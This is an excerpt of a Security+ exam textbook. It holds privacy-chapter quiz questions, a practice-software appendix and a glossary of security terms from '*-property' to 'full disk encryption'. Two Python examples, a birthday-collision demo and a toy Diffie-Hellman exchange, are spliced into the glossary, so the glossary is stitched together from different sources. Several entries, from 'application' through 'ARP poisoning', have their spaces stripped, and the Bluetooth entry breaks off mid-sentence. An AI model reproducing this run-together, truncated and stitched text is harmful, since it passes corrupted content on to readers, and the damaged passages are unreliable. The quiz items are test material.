choice (719), consent (719), cookie cutters (730), cookies (732), data protection (728), Disposal Rule (725), Freedom of Information Act (FOIA) (720), Health Insurance Portability and Accountability Act (HIPAA) (723), identity theft (725), notice (719), Notice of Privacy Practices (NPP) (723), opt-in (727), opt-out (727), Personal Information Protection and Electronic Data Act (PIPEDA) (729), personally identifiable information (PII) (717), privacy (716), Privacy Act of 1974 (720), privacy-enhancing technology (PET) (730), privacy impact assessment (PIA) (731), privacy policy (730), Protected Health Information (PHI) (723), red flag (726), red flag rules (726), Safe Harbor (729)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. In the United States, the standard methodology for consumers with respect to privacy is to _______________, whereas in the EU it is to ______________.
2. _______________ is the right to control information about oneself.
3. The FTC mandates firms' use of _______________ procedures to identify instances where additional privacy measures are warranted.
4. Differences between privacy rules and regulations in the United States and the EU are resolved through _______________ conventions.
5. Data that can be used to identify a specific individual is referred to as _______________.
6. Programs used to control the use of ___________ when web browsing are referred to as _________.
7. The major U.S. privacy statutes are ____________ and _______________.
8. Medical information in the United States is protected via the _______________.
9. Many privacy regulations have specified that firms provide an annual _______________ to customers.
10. To evaluate the privacy risks in a firm, a(n) _______________ can be performed.
Multiple-Choice Quiz
1. HIPAA requires the following controls for medical records:
A. Encryption of all data
B. Technical safeguards
C. Physical controls
D. Administrative, technical, and physical controls
2. Which of the following is not PII?
A. Customer name
B. Customer ID number
C. Customer social security number or taxpayer identification number
D. Customer birth date
3. A privacy impact assessment:
A. Determines the gap between a company's privacy practices and required actions
B. Determines the damage caused by a breach of privacy
C. Determines what companies hold information on a specific person
D. Is a corporate procedure to safeguard PII
4. Which of the following should trigger a response under the Red Flag Rule?
A. All credit requests for people under 25 or over 75
B. Any new customer credit request, except for name changes due to marriage
C. Request for credit from a customer who has a history of late payments and poor credit
D. Request for credit from a customer with a credit freeze on his credit reporting record
5. Which of the following is an acceptable PII disposal procedure?
A. Shredding
B. Burning
C. Electronic destruction per military data destruction standards
D. All of the above
6. Safe Harbor principles include:
A. Notice, Choice, Privacy Policy, Data Restrictions
B. Notice, Choice, Security, Privacy, Integrity
C. Notice, Physical Safeguards, Choice, Security, Data Integrity
D. Notice, Choice, Onward Transfer, Enforcement, Security, Data Integrity
7. European privacy laws are built upon:
A. EU Data Protection Directive
B. Personal Information Protection and Electronic Data Act (PIPEDA)
C. Safe Harbor principles
D. Common law practices
8. In the United States, company responses to data disclosures of PII are regulated by:
A. Federal law, the Privacy Act
B. A series of state statutes
C. Contractual agreements with banks and credit card processors
D. The Gramm-Leach-Bliley Act (GLBA)
9. The primary factor(s) behind data-sharing compliance between U.S. and European companies is/are?
A. Safe Harbor Provision
B. European data privacy laws
C. U.S. FTC enforcement actions
D. All of the above
10. Privacy is defined as:
A. One's ability to control information about himself or herself
B. Being able to keep your information secret
C. Making data-sharing illegal without consumer consent
D. Something that is outmoded in the Internet age
Essay Quiz
1. Privacy and technology often clash, especially when technology allows data collection that can have secondary uses. In the case of automotive technology, black boxes to collect operational data are being installed in new cars in the United States. What are the privacy implications, and what protections exist?
2. Privacy policies are found all over the Web. Pick three websites with privacy policies and compare and contrast them. What do they include and what is missing?
Lab Project
• Lab Project 25.1
Privacy-enhancing technologies can do much to protect a user's information and/or maintain anonymity when using the Web. Research onion routing and the Tor project. What do these things do? How do they work?
Appendix A: CompTIA Security+ Exam Objectives: SY0-401
Appendix B: About the Download
This e-book comes complete with Total Tester customizable practice exam software.
System Requirements
The Total Tester software requires Windows XP or higher and 30 MB of hard disk space for full installation, in addition to a current or prior major release of Chrome, Firefox, Internet Explorer, or Safari. To run, the screen resolution must be set to 1024 × 768 or higher.
Downloading Total Tester Premium Practice Exam Software
To download the Total Tester software, simply click the link below and follow the directions for free online registration.
http://www.totalsem.com/0071836012dl
Total Tester Premium Practice Exam Software
Total Tester provides you with a simulation of the actual exam. You can also create custom exams from selected certification objectives or chapters. You can further customize the number of questions and time allowed.
The exams can be taken in either Practice Mode or Exam Mode. Practice Mode provides an assistance window with hints, references to the book, explanations of the correct and incorrect answers, and the option to check your answer as you take the test. Exam Mode provides a simulation of the actual exam. The number of questions, the types of questions, and the time allowed are intended to be an accurate representation of the exam environment. Both Practice Mode and Exam Mode provide an overall grade and a grade broken down by certification objective.
NOTE: Total Tester does not provide simulations of the exam's performance-based question type. For further discussion on this question type, please see the book's Introduction.
To take a test, launch Total Tester and select the exam suite from the Installed Question Packs list. You can then select Practice Mode, Exam Mode, or Custom Mode. After making your selection, click Start Exam to begin.
Installing and Running Total Tester
Once you've downloaded the Total Tester software, double-click the Launch.exe icon. From the main screen you may install Total Tester by clicking the Install Total Tester Practice Exams link. This will begin the installation process and place an icon on your desktop and in your Start menu. To run Total Tester, navigate to Start | (All) Programs | Total Seminars, or double-click the icon on your desktop.
To uninstall the Total Tester software, go to Start | Settings | Control Panel | Add/Remove Programs (XP) or Programs And Features (Vista/7/8), and then select the Total Tester program. Select Remove and Windows will completely uninstall the software.
Technical Support
Technical Support information is provided in the following sections by feature.
Total Seminars Technical Support
For questions regarding the Total Tester software, visit www.totalsem.com or e-mail [email protected].
McGraw-Hill Education Content Support
For questions regarding book content, e-mail [email protected]. For customers outside the United States, e-mail [email protected].
GLOSSARY
*-property: Pronounced "star property," this aspect of the Bell–LaPadula security model is commonly referred to as the "no-write-down" rule because it doesn't allow a user to write to a file with a lower security classification, thus preserving confidentiality.
3DES: Triple DES encryption—three rounds of DES encryption used to improve security.
802.11: See IEEE 802.11.
802.1X: See IEEE 802.1X.
AAA: See authentication, authorization, and accounting.
acceptable use policy (AUP): A policy that communicates to users what specific uses of computer resources are permitted.
access: A subject's ability to perform specific operations on an object, such as a file. Typical access levels include read, write, execute, and delete.
access control list (ACL): A list associated with an object (such as a file) that identifies what level of access each subject (such as a user) has—what they can do to the object (such as read, write, or execute).
access controls: Mechanisms or methods used to determine what access permissions subjects (such as users) have for specific objects (such as files).
access point: Shorthand for wireless access point, the device that allows devices to connect to a wireless network.
access tokens: A token device used for access control, an example of something you have.
Active Directory: The directory service portion of the Windows operating system that stores information about network-based entities (such as applications, files, printers, and people) and provides a structured, consistent way to name, describe, locate, access, and manage these resources.
Active Server Pages (ASP): Microsoft's server-side script technology for dynamically generated web pages.
ActiveX: A Microsoft technology that facilitates rich Internet applications, and therefore extends and enhances the functionality of Microsoft Internet Explorer. Like Java, ActiveX enables the development of interactive content. When an ActiveX-aware browser encounters a web page that includes an unsupported feature, it can automatically install the appropriate application so the feature can be used.
Address Resolution Protocol (ARP): A protocol in the TCP/IP suite specification used to map an IP address to a Media Access Control (MAC) address.
Advanced Encryption Standard (AES): The current U.S. government standard for symmetric encryption, widely used in all sectors.
Advanced Encryption Standard 256-bit (AES256): An implementation of AES using a 256-bit key.
advanced persistent threat (APT): A type of advanced threat where the actors desire long-term persistence in a system over short-term gain.
adware: Advertising-supported software that automatically plays, displays, or downloads advertisements after the software is installed or while the application is being used.
agile model: A software development model built around the idea of many small iterations that continually yield a "finished" product at the completion of each iteration.
air gap: The forced separation of networks, resulting in an air gap between systems. Communications across an air gap require a manual effort to move data from one network to another, as no network connection exists between the two networks.
algorithm: A step-by-step procedure—typically an established computation for solving a problem within a set number of steps.
annualized loss expectancy (ALE): How much an event is expected to cost the business per year, given the dollar cost of the loss and how often it is likely to occur. ALE = single loss expectancy × annualized rate of occurrence.
annualized rate of occurrence (ARO): The frequency with which an event is expected to occur on an annualized basis.
anomaly: Something that does not fit into an expected pattern.
antispam: Technology used to combat unsolicited junk e-mail, or spam.
antivirus (AV): Technology employed to screen for and block the execution of viruses and other malware.
applicationAprogramorgroupofprogramsdesignedtoprovide
specificuserfunctions,suchasawordprocessororwebserver.
applicationhardeningThestepstakentohardenanapplication,mitigatingvulnerabilitiesandreducingtheexploitablesurface.
applicationprogramminginterface(API)Asetofinstructionsastohowtointerfacewithacomputerprogramsothatdeveloperscanaccessdefinedinterfacesinaprogram.
applicationserviceprovider(ASP)AcompanythatoffersentitiesaccessovertheInternettoapplicationsandservices.
applicationvulnerabilityscannerTechnologyusedtoscanapplicationsforpotentialvulnerabilitiesandweaknesses.
ARPSeeAddressResolutionProtocol.
ARPbackscatterTheuseofARPscanningagainstagatewaydevicetodetectthepresenceofadevicebehindthegatewayorrouter.
ARPpoisoningAnattackcharacterizedbychangingentriesinanARPtabletocausemisdirectedtraffic.
asset: Resources and information an organization needs to conduct its business.
asymmetric encryption: Also called public key cryptography, this is a system for encrypting data that uses two mathematically derived keys to encrypt and decrypt a message—a public key, available to everyone, and a private key, available only to the owner of the key.
attribute-based access control (ABAC): An access control model built around a set of rules built upon specific attributes.
auditability: The property of an item that makes it available for verification upon inspection.
audit trail: A set of records or events, generally organized chronologically, that records what activity has occurred on a system. These records (often computer files) are often used in an attempt to re-create what took place when a security incident occurred, and they can also be used to detect possible intruders.
auditing: Actions or processes used to verify the assigned privileges and rights of a user, or any capabilities used to create and maintain a record showing who accessed a particular system and what actions they performed.
authentication: The process by which a subject’s (such as a user’s) identity is verified.
authentication, authorization, and accounting (AAA): Three common functions performed upon system login. Authentication and authorization almost always occur, with accounting being somewhat less common.
Authentication Header (AH): A portion of the IPsec security protocol that provides authentication services and replay-detection ability. AH can be used either by itself or with Encapsulating Security Payload (ESP). Refer to RFC 2402.
authentication server (AS): A server used to perform authentication tasks.
Authenticode: Microsoft code-signing technology used to provide integrity and attribution on software.
authority revocation list (ARL): A list of authorities that have had their certificates revoked.
authorization: The function of determining what is permitted for an authorized user.
autoplay: Technology employed to launch appropriate applications and play or display content on removable media when the media is mounted.
availability: Part of the “CIA” of security. Availability applies to hardware, software, and data, specifically meaning that each of these should be present and accessible when the subject (the user) wants to access or use them.
backdoor: A hidden method used to gain access to a computer system, network, or application. Often used by software developers to ensure unrestricted access to the systems they create. Synonymous with trapdoor.
backout planning: The part of a configuration change plan where steps are devised to undo a change, even when not complete, to restore a system back to the previous operating condition.
backup: Refers to copying and storing data in a secondary location, separate from the original, to preserve the data in the event that the original is lost, corrupted, or destroyed.
baseline: A system or software as it is built and functioning at a specific point in time. Serves as a foundation for comparison or measurement, providing the necessary visibility to control change.
Basic Input/Output System (BIOS): A firmware element of a computer system that provides the interface between hardware and system software with respect to devices and peripherals. BIOS is being replaced by Extensible Firmware Interface (EFI), a more complex and capable system.
beacon frames: A series of frames used in WiFi (802.11) to establish the presence of a wireless network device.
Bell–LaPadula security model: A computer security model built around the property of confidentiality and characterized by no-read-up and no-write-down rules.
best evidence rule: A legal principle that supports a true copy as equivalent to the original.
BGP: See Border Gateway Protocol.
Biba security model: An information security model built around the property of integrity and characterized by no-write-up and no-read-down rules.
biometrics: Used to verify an individual’s identity to the system or network using something unique about the individual, such as a fingerprint, for the verification process. Examples include fingerprints, retinal scans, hand and facial geometry, and voice analysis.
BIOS: See Basic Input/Output System.
birthday attack: A form of attack in which the attack needs to match not a specific item but just one of a set of items.
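A worked illustration of the birthday-attack and collision entries, added here as an example and not part of the glossary: it shows why matching "any one of a set" needs roughly the square root of the trials that matching one specific digest does. SHA-256 is truncated to a small, constructed number of bits so the effect is visible in milliseconds; the function names and the "constructed-message-N" inputs are the example's own.

```python
import hashlib
import math
from itertools import count


def collision_probability(space: int, k: int) -> float:
    """Exact probability that k values drawn uniformly from `space` outcomes contain a repeat."""
    p_distinct = 1.0
    for i in range(k):
        p_distinct *= (space - i) / space
    return 1.0 - p_distinct


def birthday_bound(bits: int) -> float:
    """Expected number of random samples before the first repeat in a 2**bits space, sqrt(pi/2 * N)."""
    return math.sqrt(math.pi / 2 * (1 << bits))


def truncated_digest(data: bytes, bits: int) -> int:
    """Leading `bits` bits of SHA-256: a deliberately tiny digest so a repeat can be found quickly."""
    full = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return full >> (256 - bits)


def find_any_collision(bits: int):
    """Birthday search: stop at the first pair of distinct inputs sharing a truncated digest.

    Returns (first_input, second_input, digest, trials).
    """
    seen = {}
    for i in count():
        msg = f"constructed-message-{i}".encode()   # constructed inputs
        d = truncated_digest(msg, bits)
        if d in seen:
            return seen[d], msg, d, i + 1
        seen[d] = msg


def find_specific_preimage(target: int, bits: int, limit: int):
    """The non-birthday case: search for one particular digest value.

    Returns (input, trials) or None if not found within `limit` trials; on average this
    needs about 2**bits trials rather than the sqrt(2**bits) of the birthday search.
    """
    for i in range(limit):
        msg = f"constructed-message-{i}".encode()
        if truncated_digest(msg, bits) == target:
            return msg, i + 1
    return None


if __name__ == "__main__":
    bits = 16
    a, b, d, trials = find_any_collision(bits)
    print(f"repeat on a {bits}-bit digest ({d:#06x}) after {trials} trials; "
          f"expected about {birthday_bound(bits):.0f}, versus about {1 << bits} "
          f"to hit one specific digest")
```

The defender's reading of this is the sizing rule: a digest that must resist collisions gives only half its bit length in security, which is why 128-bit digests are considered too short for signatures and certificates while a 256-bit digest still leaves a 128-bit birthday margin.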
blacklisting: The term used to describe the exclusion of items based on their being on a list (blacklist).
black-box testing: A form of testing where the tester has no knowledge of the inner workings of a mechanism.
block cipher: A cipher that operates on blocks of data.
Blowfish: A free implementation of a symmetric block cipher developed by Bruce Schneier as a drop-in replacement for DES and IDEA. It has a variable bit-length scheme from 32 to 448 bits, resulting in varying levels of security.
bluebugging: The use of a Bluetooth-enabled device to eavesdrop on another person’s conversation using that person’s Bluetooth phone as a transmitter. The bluebug application silently causes a Bluetooth device to make a phone call to another device, causing the phone to act as a transmitter and allowing the listener to eavesdrop on the victim’s conversation in real time.
bluejacking: The sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, tablets, or laptop computers.
bluesnarfing: The unauthorized access of information from a Bluetooth-enabled device through a Bluetooth connection, often between phones, desktops, laptops, and tablets.
Bluetooth: An RF technology used for short-range networking,
Border Gateway Protocol (BGP): The interdomain routing protocol implemented in Internet Protocol (IP) networks to enable routing between autonomous systems.
botnet: A term for a collection of software robots, or bots, that runs autonomously and automatically and commonly invisibly in the background. The term is most often associated with malicious software, but it can also refer to the network of computers using distributed computing software.
Brewer-Nash security model: A security model defined by controlling read and write access based on conflict of interest rules. This model is also known as the Chinese-Wall model, after the concept of separating groups through the use of an impenetrable wall.
bridge: A network device that separates traffic into separate collision domains at the data layer of the OSI model.
bring your own device (BYOD): A term used to describe an environment where users bring their personally owned devices into the enterprise and integrate them into business systems.
buffer overflow: A specific type of software coding error that enables user input to overflow the allocated storage area and corrupt a running program.
Bureau of Industry and Security (BIS): In the U.S. Department of Commerce, the department responsible for export administration regulations that cover encryption technology in the United States.
bus topology: A network layout in which a common line (the bus) connects devices.
business continuity plan (BCP): The plans a business develops to continue critical operations in the event of a major disruption.
business impact analysis (BIA): An analysis of the impact to the business of a specific event.
business partnership agreement (BPA): A written agreement defining the terms and conditions of a business partnership.
BYOD: See bring your own device.
CA certificate: A digital certificate identifying the keys used by a certificate authority.
cache: The temporary storage of information before use, typically used to speed up systems. In an Internet context, refers to the storage of commonly accessed web pages, graphic files, and other content locally on a user’s PC or a web server. The cache helps to minimize download time and preserve bandwidth for frequently accessed websites, and it helps reduce the load on a web server.
Capability Maturity Model (CMM): A structured methodology helping organizations improve the maturity of their software processes by providing an evolutionary path from ad hoc processes to disciplined software management processes. Developed at Carnegie Mellon University’s Software Engineering Institute (SEI).
Capability Maturity Model Integration (CMMI): A trademarked process improvement methodology for software engineering. Developed at Carnegie Mellon University’s Software Engineering Institute (SEI).
captive portal: A website used to validate credentials before allowing access to a network connection.
centralized management: A type of privilege management that brings the authority and responsibility for managing and maintaining rights and privileges into a single group, location, or area.
CERT: See Computer Emergency Response Team.
certificate: A cryptographically signed object that contains an identity and a public key associated with this identity. The certificate can be used to establish identity, analogous to a notarized written document.
certificate authority (CA): An entity responsible for issuing and revoking certificates. CAs are typically not associated with the company requiring the certificate, although they exist for internal company use as well (such as Microsoft). This term also applies to server software that provides these services. The term certificate authority is used interchangeably with certification authority.
Certificate Enrollment Protocol (CEP): Originally developed by VeriSign for Cisco Systems to support certificate issuance, distribution, and revocation using existing technologies.
certificate path: An enumeration of the chain of trust from one certificate to another tracing back to a trusted root.
certificate repository: A storage location for certificates on a system so that they can be reused.
certificate revocation list (CRL): A digitally signed object that lists all of the current but revoked certificates issued by a given certification authority. This allows users to verify whether a certificate is currently valid even if it has not expired. A CRL is analogous to a list of stolen charge card numbers that allows stores to reject bad credit cards.
certificate server: A server—part of a PKI system—that handles digital certificates.
certificate signing request (CSR): A structured message sent to a certificate authority requesting a digital certificate.
certification practices statement (CPS): A document that describes the policy for issuing digital certificates from a CA.
chain of custody: Rules for documenting, handling, and safeguarding evidence to ensure no unanticipated changes are made to the evidence.
Challenge-Handshake Authentication Protocol (CHAP): Used to provide authentication across point-to-point links using the Point-to-Point Protocol (PPP).
change (configuration) management: A standard methodology for performing and recording changes during software development and operation.
change control board (CCB): A body that oversees the change management process and enables management to oversee and coordinate projects.
CHAP: See Challenge-Handshake Authentication Protocol.
CIA of security: Refers to confidentiality, integrity, and availability, the basic functions of any security system.
cipher: A cryptographic system that accepts plaintext input and then outputs ciphertext according to its internal algorithm and key.
ciphertext: Used to denote the output of an encryption algorithm. Ciphertext is the encrypted data.
CIRT: See Computer Emergency Response Team.
Clark-Wilson security model: A security model that uses transactions and a differentiation of constrained data items (CDI) and unconstrained data items (UDI).
closed circuit television (CCTV): A private television system usually hardwired in security applications to record visual information.
cloud computing: The automatic provisioning of on-demand computational resources across a network.
coaxial cable: A network cable that consists of a solid center core conductor and a physical spacer to the outer conductor, which is wrapped around it. Commonly used in video systems.
code injection: An attack where unauthorized executable code is injected via an interface in an attempt to get it to run on a system.
code signing: The application of digital signature technology to software for purposes of integrity and authentication control.
cold site: An inexpensive form of backup site that does not include a current set of data at all times. A cold site takes longer to get your operational system back up, but it is considerably less expensive than a warm or hot site.
collision attack: An attack on a hash function in which a specific input is generated to produce a hash function output that matches another input.
collision domain: An area of shared traffic in a network where packets from different conversations can collide.
collisions: Used in the analysis of hashing cryptography, it is the property by which an algorithm will produce the same hash from two different sets of data.
Common Access Card (CAC): A smart card used to access federal computer systems, and to also act as an ID card.
Common Gateway Interface (CGI): An older, outdated technology used for server-side execution of programs on websites.
Common Vulnerabilities and Exposures (CVE): A structured language (XML) schema used to describe known vulnerabilities in software.
Common Weakness Enumeration (CWE): A structured language (XML) schema used to describe known weakness patterns in software that can result in vulnerabilities.
complete mediation: The principle that protection mechanisms should cover every access to every object.
Computer Emergency Response Team (CERT): Also known as a Computer Incident Response Team (CIRT), this group is responsible for investigating and responding to security breaches, viruses, and other potentially catastrophic incidents.
computer security: In general terms, the methods, techniques, and tools used to ensure that a computer system is secure.
computer software configuration item: See configuration item.
concentrator: A device used to manage multiple similar networking operations, such as providing a VPN endpoint for multiple VPNs.
confidentiality: Part of the CIA of security. Refers to the security principle that states that information should not be disclosed to unauthorized individuals.
configuration auditing: The process of verifying that configuration items are built and maintained according to requirements, standards, or contractual agreements.
configuration control: The process of controlling changes to items that have been baselined.
configuration identification: The process of identifying which assets need to be managed and controlled.
configuration item: Data or software (or other asset) that is identified and managed as part of the software change management process. Also known as computer software configuration item.
configuration status accounting: Procedures for tracking and maintaining data relative to each configuration item in the baseline.
confusion: A principle that, when employed, makes each character of ciphertext dependent on several parts of the key.
content protection: The protection of the header and data portion of a user datagram.
context protection: The protection of the header of a user datagram.
contingency planning (CP): The act of creating processes and procedures that are used under special conditions (contingencies).
Continuity of Operations Planning (COOP): The creation of plans related to continuing essential business operations.
control: A measure taken to detect, prevent, or mitigate the risk associated with a threat.
Controller Area Network: A bus standard for use in vehicles to connect microcontrollers.
cookie: Information stored on a user’s computer by a web server to maintain the state of the connection to the web server. Used primarily so preferences or previously used information can be recalled on future requests to the server.
COOP: See Continuity of Operations Planning.
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP): An enhanced data cryptographic encapsulation mechanism based on the counter mode with CBC-MAC from AES and designed for use over wireless LANs.
countermeasure: See control.
cracking: A term used by some to refer to malicious hacking, in which an individual attempts to gain unauthorized access to computer systems or networks. See also hacking.
critical infrastructure: Infrastructure whose loss or impairment would have severe repercussions on society.
CRC: See cyclic redundancy check.
CRL: See certificate revocation list.
cross-certification certificate: A certificate used to establish trust between separate PKIs.
crossover error rate (CER): The point at which the false rejection rate and false acceptance rate are equal in a system.
cross-site request forgery (CSRF or XSRF): A method of attacking a system by sending malicious input to the system and relying upon the parsers and execution elements to perform the requested actions, thus instantiating the attack. XSRF exploits the trust a site has in the user’s browser.
cross-site scripting (XSS): A method of attacking a system by sending script commands to the system input and relying upon the parsers and execution elements to perform the requested scripted actions, thus instantiating the attack. XSS exploits the trust a user has for the site.
cryptanalysis: The process of attempting to break a cryptographic system.
cryptographically random: A random number that is derived from a nondeterministic source, thus knowing one random number provides no insight into the next.
cryptography: The art of secret writing that enables an individual to hide the contents of a message or file from all but the intended recipient.
Cyber Observable eXpression (CybOX): A structured (XML) language for describing cybersecurity events at a granular level.
cyclic redundancy check (CRC): An error detection technique that uses a series of two 8-bit block check characters to represent an entire block of data. These block check characters are incorporated into the transmission frame and then checked at the receiving end.
DAC: See discretionary access control.
data aggregation: A methodology of collecting information through the aggregation of separate pieces and analyzing the effect of their collection.
Data Encryption Standard (DES): A private key encryption algorithm adopted by the government as a standard for the protection of sensitive but unclassified information. Commonly used in Triple DES (3DES), where three rounds are applied to provide greater security.
Data Execution Prevention (DEP): A security feature of an OS that can be driven by software, hardware, or both, designed to prevent the execution of code from blocks of data in memory.
data loss prevention (DLP): Technology, processes, and procedures designed to detect when unauthorized removal of data from a system occurs. DLP is typically active, preventing the loss of data, either by blocking the transfer or dropping the connection.
datagram: A packet of data that can be transmitted over a packet-switched system in a connectionless mode.
decision tree: A data structure in which each element in the structure is attached to one or more structures directly beneath it.
default deny: The use of an overarching rule that if not explicitly permitted, permission will be denied.
delta backup: A type of backup that preserves only the blocks that have changed since the last full backup.
demilitarized zone (DMZ): A network segment that exists in a semi-protected zone between the Internet and the inner, secure trusted network.
denial-of-service (DoS) attack: An attack in which actions are taken to deprive authorized individuals from accessing a system, its resources, the data it stores or processes, or the network to which it is connected.
DES: See Data Encryption Standard.
DHCP: See Dynamic Host Configuration Protocol.
Diameter: The base protocol that is intended to provide an authentication, authorization, and accounting (AAA) framework for applications such as network access or IP mobility. Diameter is a draft IETF proposal.
differential backup: A type of backup that preserves only changes since the last full backup.
differential cryptanalysis: A form of cryptanalysis that uses different inputs to study how outputs change in a structured manner.
Diffie-Hellman: A cryptographic method of establishing a shared key over an insecure medium in a secure fashion.
Diffie-Hellman Ephemeral (DHE): A cryptographic method of establishing a shared key over an insecure medium in a secure fashion using a temporary key to enable perfect forward secrecy (PFS).
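The exchange described in the Diffie-Hellman and DHE entries, written out as an added example (not code from the glossary or its authors): both sides create a throwaway key pair, only the public values cross the insecure medium, and each side arrives at the same shared value. The group parameters P and G are a constructed toy group chosen so the arithmetic can be checked by hand; the function names are the example's own.

```python
import hashlib
import secrets

# Toy group, constructed for readability only. Real deployments use standardized
# groups of 2048 bits or more (for example the RFC 3526 / RFC 7919 MODP groups).
P = 23   # modulus
G = 5    # generator


def generate_ephemeral(p: int = P, g: int = G):
    """Fresh private exponent and matching public value, used for one session only."""
    private = secrets.randbelow(p - 2) + 1          # 1 <= private <= p - 2
    return private, pow(g, private, p)


def shared_secret(my_private: int, their_public: int, p: int = P) -> int:
    """g^(ab) mod p, computed by each side from its own private value and the peer's public value."""
    return pow(their_public, my_private, p)


def derive_session_key(secret: int) -> bytes:
    """Hash the raw shared value into a fixed-size key (a stand-in for a real KDF)."""
    return hashlib.sha256(b"dhe-example-kdf" + secret.to_bytes(4, "big")).digest()


def run_session() -> bytes:
    """One DHE handshake. The private exponents live only in this function's scope,
    which is what makes the key ephemeral: nothing stored afterwards can reproduce it."""
    a_private, a_public = generate_ephemeral()
    b_private, b_public = generate_ephemeral()
    # Only a_public and b_public are sent over the insecure medium.
    key_a = derive_session_key(shared_secret(a_private, b_public))
    key_b = derive_session_key(shared_secret(b_private, a_public))
    assert key_a == key_b, "both sides must derive the same key"
    return key_a


if __name__ == "__main__":
    print("session key:", run_session().hex())
```

With the textbook values a = 6 and b = 15, the public values are 5^6 mod 23 = 8 and 5^15 mod 23 = 19, and both 19^6 mod 23 and 8^15 mod 23 equal 2. The forward-secrecy property comes entirely from discarding a_private and b_private after the session; a long-term signing key (not modelled here) only authenticates the public values, so its later compromise does not expose past session keys.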
diffusion: A principle that the statistical analysis of plaintext and ciphertext results in a form of dispersion rendering one structurally independent of the other. In plain terms, a change in one character of plaintext should result in multiple changes in the ciphertext, in such a manner that changes in ciphertext do not reveal information as to the structure of the plaintext.
digital certificate: See certificate.
digital rights management: The control of user activities associated with a digital object via technological means.
digital sandbox: The isolation of a program and its supporting elements from common operating system functions.
digital signature: A cryptography-based artifact that is a key component of a public key infrastructure (PKI) implementation. A digital signature can be used to prove identity because it is created with the private key portion of a public/private key pair. A recipient can decrypt the signature and, by doing so, receive the assurance that the data must have come from the sender and that the data has not changed.
digital signature algorithm (DSA): A U.S. government standard for implementing digital signatures.
direct-sequence spread spectrum (DSSS): A method of distributing a communication over multiple frequencies to avoid interference and detection.
disaster recovery plan (DRP): A written plan developed to address how an organization will react to a natural or manmade disaster in order to ensure business continuity. Related to the concept of a business continuity plan (BCP).
discretionary access control (DAC): An access control mechanism in which the owner of an object (such as a file) can decide which other subjects (such as other users) may have access to the object, and what access (read, write, execute) these subjects can have.
distributed denial-of-service (DDoS) attack: A special type of DoS attack in which the attacker elicits the generally unwilling support of other systems to launch a many-against-one attack.
diversity of defense: The approach of creating dissimilar security layers so that an intruder who is able to breach one layer will be faced with an entirely different set of defenses at the next layer.
DNS kiting: The use of a DNS record during the payment grace period without paying.
DomainKeys Identified Mail (DKIM): An authentication system for e-mail designed to detect spoofing of e-mail addresses.
Domain Name System (DNS): The service that translates Internet domain names (such as www.mcgrawhill.com) into IP addresses.
DMZ: See demilitarized zone.
drive-by download attack: An attack on an innocent victim machine where content is downloaded without the user’s knowledge.
DRP: See disaster recovery plan.
DSSS: See direct-sequence spread spectrum.
due care: The degree of care that a reasonable person would exercise under similar circumstances.
due diligence: The reasonable steps a person or entity would take in order to satisfy legal or contractual requirements—commonly used when buying or selling something of significant value.
dumpster diving: The practice of searching through trash to discover sensitive material that has been thrown away but not destroyed or shredded.
Dynamic Host Configuration Protocol (DHCP): An Internet Engineering Task Force (IETF) Internet Protocol (IP) specification for automatically allocating IP addresses and other configuration information based on network adapter addresses. It enables address pooling and allocation and simplifies TCP/IP installation and administration.
dynamic link library (DLL): A shared library function used in the Microsoft Windows environment.
EAP: See Extensible Authentication Protocol.
economy of mechanism: The principle that designs should be small and simple.
electromagnetic interference (EMI): The disruption or interference of electronics due to an electromagnetic field.
elite hacker: A hacker who has the skill level necessary to discover and exploit new vulnerabilities.
elliptic curve cryptography (ECC): A method of public-key cryptography based on the algebraic structure of elliptic curves over finite fields.
elliptic curve Diffie-Hellman Ephemeral (ECDHE): A cryptographic method using ECC to establish a shared key over an insecure medium in a secure fashion using a temporary key to enable perfect forward secrecy (PFS).
Encapsulating Security Payload (ESP): A portion of the IPsec implementation that provides for data confidentiality with optional authentication and replay detection services. ESP completely encapsulates user data in the datagram and can be used either by itself or in conjunction with Authentication Headers for varying degrees of IPsec services.
enclave: A section of a network that serves a specific purpose and is isolated by protocols from other parts of a network.
encryption: The reversible process of rendering data unreadable through the use of an algorithm and a key.
Encrypting File System (EFS): A security feature of Windows, from Windows 2000 onward, that enables the transparent encryption/decryption of files on the system.
entropy: The measure of uncertainty associated with a series of values. Perfect entropy equates to complete randomness, such that given any string of bits, there is no computation to improve guessing the next bit in the sequence.
ephemeral keys: Cryptographic keys that are used only once after they are generated.
escalation auditing: The process of looking for an increase in privileges, such as when an ordinary user obtains administrator-level privileges.
Ethernet: The common name for the IEEE 802.3 standard method of packet communication between two nodes at layer 2.
evidence: The documents, verbal statements, and material objects admissible in a court of law.
evil twin: A wireless attack performed using a second, rogue wireless access point designed to mimic a real access point.
eXclusive OR (XOR): Bitwise function commonly used in cryptography.
exposure factor: A measure of the magnitude of loss of an asset. Used in the calculation of single loss expectancy (SLE).
eXtensible Access Control Markup Language (XACML): An open standard XML-based language used to describe access control.
Extensible Authentication Protocol (EAP): A universal authentication framework used in wireless networks and point-to-point connections. It is defined in RFC 3748 and has been updated by RFC 5247.
Extensible Markup Language (XML): A text-based, human-readable data markup language.
fail-safe defaults: The principle that when a system fails, the default failure state will be a safe state by design.
false negative: Term used when a system makes an error and misses reporting the existence of an item that should have been detected.
false positive: Term used when a security system makes an error and incorrectly reports the existence of a searched-for object. Examples include an intrusion detection system that misidentifies benign traffic as hostile, an antivirus program that reports the existence of a virus in software that actually is not infected, or a biometric system that allows access to a system to an unauthorized individual.
fault tolerance: The characteristics of a system that permit it to operate even when sub-components of the overall system fail.
FHSS: See frequency-hopping spread spectrum.
file system access control list (FACL): The implementation of access controls as part of a file system.
File Transfer Protocol (FTP): An application-level protocol used to transfer files over a network connection.
File Transfer Protocol Secure (FTPS): An application-level protocol used to transfer files over a network connection that uses FTP over an SSL or TLS connection.
firewall: A network device used to segregate traffic based on rules.
flood guard: A network device that blocks flooding-type DoS/DDoS attacks, frequently part of an IDS/IPS.
footprinting: The steps a tester uses to determine the range and scope of a system.
forensics (or computer forensics): The preservation, identification, documentation, and interpretation of computer data for use in legal proceedings.
free space: Sectors on a storage medium that are available for the operating system to use.
frequency-hopping spread spectrum (FHSS): A method of distributing a communication over multiple frequencies over time to avoid interference and detection.
full backup: A complete backup of all files and structures of a system to another location.
full disk encryption (FDE): The application of encryption to an entire disk, protecting all of the contents in one container.
